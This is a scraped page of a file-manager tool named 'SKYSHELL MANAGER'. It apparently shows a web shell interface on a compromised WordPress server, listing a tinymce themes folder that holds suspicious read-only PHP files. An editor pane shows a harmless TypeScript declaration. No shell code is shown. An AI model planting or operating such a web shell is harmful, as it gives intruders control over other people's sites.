📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: SourceMapSource.d.ts
import { RawSourceMap, SourceMapGenerator } from 'source-map'; import { SourceAndMapMixin } from '.'; import Source = require('./Source'); /** * Represents source code with SourceMap, optionally having an additional SourceMap for the original source. */ declare class SourceMapSource extends Source implements SourceAndMapMixin { constructor( sourceCode: string, name: string, sourceMap: SourceMapGenerator | RawSourceMap, originalSource?: string, innerSourceMap?: RawSourceMap | string, removeOriginalSource?: boolean, ); buffer(): Buffer; source(): string; } export = SourceMapSource;
Save